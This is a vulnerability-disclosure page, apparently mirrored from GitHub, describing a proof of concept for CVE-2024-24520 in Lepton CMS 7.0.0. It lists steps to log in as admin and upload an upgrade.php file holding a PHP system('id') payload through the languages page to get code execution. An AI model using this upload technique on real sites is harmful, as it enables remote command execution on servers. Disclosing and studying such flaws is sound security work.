CVE-2024-24520 PoC — LeptonCMS 安全漏洞

Source

https://github.com/xF-9979/CVE-2024-24520

Associated Vulnerability

Title:LeptonCMS 安全漏洞 (CVE-2024-24520)
Description:An issue in Lepton CMS v.7.0.0 allows a local attacker to execute arbitrary code via the upgrade.php file in the languages place.

Description

Arbitrary code execution vulnerability

Readme

# LEPTON-CMS
Arbitrary code execution vulnerability

BUG_Author:
xF_9979（Jin Han）

[VulnerabilityType Other]
Remote Code Execution Vulnerability

[Vendor of Product]
Lepton CMS


[Affected Product Code Base]
Lepton CMS - 7.0.0
[Affected Component]
1 ) Login with admin cred > https://127.0.0.1/LEPTONevy1ldfvvd/backend/login/index.php

![image](https://github.com/xF9979/LEPTON-CMS-/assets/108913864/6797bf14-3d9d-4efd-837f-7311d00fe158)


2 ) Go to Languages place > https://demos6.softaculous.com/LEPTONevy1ldfvvd/backend/languages/index.php?leptoken=acf433dcae00c2ce8b8dfz1708226799

![image](https://github.com/xF9979/LEPTON-CMS-/assets/108913864/90999bc0-6b94-473b-a8ef-19011c925efd)

 3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?>

 ![image](https://github.com/xF9979/LEPTON-CMS-/assets/108913864/809c4547-244e-4b80-8846-3466f752540f)

 ![image](https://github.com/xF9979/LEPTON-CMS-/assets/108913864/72b8f245-fad9-4758-8927-edd7d7caced7)

4 ) After uploading, you can see the code execution status
![image](https://github.com/xF9979/LEPTON-CMS-/assets/108913864/8d2914b8-30b2-44b6-90a2-fb9f41335e43)

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!